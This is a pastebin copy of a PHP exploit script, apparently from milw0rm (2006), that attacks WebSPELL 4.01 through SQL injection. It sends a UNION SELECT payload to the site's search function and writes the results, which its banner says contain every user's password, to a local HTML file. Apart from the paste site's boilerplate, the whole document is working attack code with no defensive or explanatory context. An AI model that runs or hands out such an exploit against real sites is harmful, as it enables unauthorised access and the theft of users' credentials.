PHP 11
WebSPELL.php Guest on 8th September 2020 05:11:21 PM
  1. <?
  2. function xss_header()
  3. {
  4.     echo "ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
  5.     echo "                                  oo    ooooooo     ooooooo\n";
  6.     echo "                    oooo   oooo o888  o88     888 o888   888o\n";
  7.     echo "                      888o888    888        o888   888888888\n";
  8.     echo "                      o88 88o    888     o888   o 888o   o888\n";
  9.     echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
  10.     echo "ooooooooooooooooooooo webspell 4.01 sql injection exploit ooooooooooooooooooooo\n";
  11.     echo "";
  12.     echo "oo usage oooo $ php webspell-401-sql-inject.php [url] [prefix] oooooooooooooooo\n";
  13.     echo "oo example oo $ php webspell-401-sql-inject.php http://localhost webs_ oooooooo\n";
  14.     echo "oo open the file xss_result.html - there you find the passwords of all users oo\n";
  15. }
  16.  
  17. function xss_bottom()
  18. {
  19.     echo "\noo exploit need curl extension\n";
  20.     echo "oo discover : x128 - 13/02/2006\n";
  21.     echo "oo contact  : [email protected]             oo website : people.freenet.de/x128";
  22. }
  23.  
  24. function xss_exploit()
  25. {
  26.     $xss_target = $_SERVER['argv'][1] . "/index.php?site=search&action=search";
  27.     $xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*";
  28.  
  29.     $xss_connection = curl_init();
  30.  
  31.  
  32.     curl_setopt ($xss_connection, CURLOPT_URL, $xss_target);
  33.     curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
  34.     curl_setopt ($xss_connection, CURLOPT_POST, 1);
  35.     curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post);
  36.     curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
  37.     curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');
  38.  
  39.     $xss_source = curl_exec($xss_connection) or die("oo error!\n");
  40.  
  41.     $xss_output = fopen("xss_result.html","w");
  42.     fputs($xss_output, $xss_source);
  43.     fclose($xss_output);
  44.  
  45.     curl_close ($xss_connection);
  46. }
  47.  
  48. xss_header();
  49. xss_exploit();
  50. xss_bottom();
  51. ?>
  52.  
  53. # milw0rm.com [2006-02-14]

Paste is for source code and general debugging text.

Login or Register to edit, delete and keep track of your pastes and more.

Raw Paste

Login or Register to edit or fork this paste. It's free.